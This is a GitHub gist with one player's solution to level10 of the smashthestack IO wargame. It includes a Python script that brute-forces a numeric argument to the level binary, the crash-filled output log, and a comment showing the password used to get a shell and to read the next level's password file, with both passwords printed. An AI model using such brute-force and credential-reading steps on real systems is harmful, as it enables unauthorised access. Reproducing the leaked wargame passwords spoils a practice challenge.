Skip to content

Instantly share code, notes, and snippets.

@17twenty

17twenty/output.log

Created May 20, 2014 11:19
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 17twenty/e1ad57ef8a1edd462bfc to your computer and use it in GitHub Desktop.
Save 17twenty/e1ad57ef8a1edd462bfc to your computer and use it in GitHub Desktop.
Download ZIP
Output from level10 of smashthestack
Raw
output.log
level10@io:~$ python /tmp/runme.py
/levels/level10: relocation error: /levels/level10: symbol _gmon_start__, version GLIBC_2.1 not defined in file libc.so.6 with link time reference
/levels/level10: relocation error: /levels/level10: symbol _start__, version GLIBC_2.1 not defined in file libc.so.6 with link time reference
/levels/level10: symbol lookup error: /levels/level10: undefined symbol: strcmp, version GLIBC_2.2.4
Inconsistency detected by ld.so: dl-runtime.c: 87: _dl_fixup: Assertion `((reloc->r_info) & 0xff) == 7' failed!
*** glibc detected *** /levels/level10: double free or corruption (!prev): 0x0804a008 ***
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb7edff01]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb7ee1768]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb7ee48ad]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(fclose+0x14a)[0xb7ed03ba]
/levels/level10[0x8048585]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e85e46]
/levels/level10[0x8048441]
======= Memory map: ========
08048000-08049000 r-xp 00000000 fe:00 268659 /levels/level10
08049000-0804a000 rw-p 00000000 fe:00 268659 /levels/level10
0804a000-0806b000 rw-p 00000000 00:00 0 [heap]
b7d00000-b7d21000 rw-p 00000000 00:00 0
b7d21000-b7e00000 ---p 00000000 00:00 0
b7e51000-b7e6d000 r-xp 00000000 fe:00 393223 /lib/i386-linux-gnu/libgcc_s.so.1
b7e6d000-b7e6e000 rw-p 0001b000 fe:00 393223 /lib/i386-linux-gnu/libgcc_s.so.1
b7e6e000-b7e6f000 rw-p 00000000 00:00 0
b7e6f000-b7fcc000 r-xp 00000000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcc000-b7fcd000 ---p 0015d000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcd000-b7fcf000 r--p 0015d000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcf000-b7fd0000 rw-p 0015f000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fd0000-b7fd3000 rw-p 00000000 00:00 0
b7fdf000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
*** glibc detected *** /levels/level10: double free or corruption (!prev): 0x0804a008 ***
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x70f01)[0xb7edff01]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x72768)[0xb7ee1768]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(cfree+0x6d)[0xb7ee48ad]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(fclose+0x14a)[0xb7ed03ba]
/levels/level10[0x8048585]
/lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e85e46]
/levels/level10[0x8048441]
======= Memory map: ========
08048000-08049000 r-xp 00000000 fe:00 268659 /levels/level10
08049000-0804a000 rw-p 00000000 fe:00 268659 /levels/level10
0804a000-0806b000 rw-p 00000000 00:00 0 [heap]
b7d00000-b7d21000 rw-p 00000000 00:00 0
b7d21000-b7e00000 ---p 00000000 00:00 0
b7e51000-b7e6d000 r-xp 00000000 fe:00 393223 /lib/i386-linux-gnu/libgcc_s.so.1
b7e6d000-b7e6e000 rw-p 0001b000 fe:00 393223 /lib/i386-linux-gnu/libgcc_s.so.1
b7e6e000-b7e6f000 rw-p 00000000 00:00 0
b7e6f000-b7fcc000 r-xp 00000000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcc000-b7fcd000 ---p 0015d000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcd000-b7fcf000 r--p 0015d000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fcf000-b7fd0000 rw-p 0015f000 fe:00 393246 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fd0000-b7fd3000 rw-p 00000000 00:00 0
b7fdf000-b7fe1000 rw-p 00000000 00:00 0
b7fe1000-b7fe2000 r-xp 00000000 00:00 0 [vdso]
b7fe2000-b7ffe000 r-xp 00000000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 fe:00 403234 /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
1208263596
level10@io:~$ whoami
level10
level10@io:~$ /levels/level10 1208263596
AverYloNgPassword!!
level10@io:~$
Raw
runme.py
#!/usr/bin/env python
import subprocess
import sys
foo = ""
i = 1200000000
while True:
i += 1
try:
foo = subprocess.check_output(['/levels/level10', str(i)])
except:
continue
else:
if "DENIED" not in foo:
print i
sys.exit()
@17twenty
Copy link
Author

level10@io:~$ /levels/level10 'AverYloNgPassword!!'
sh-4.2$ whoami
sh-4.2$ cat ~level11/.pass
oYZ4UoMIao6oPNhHCo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment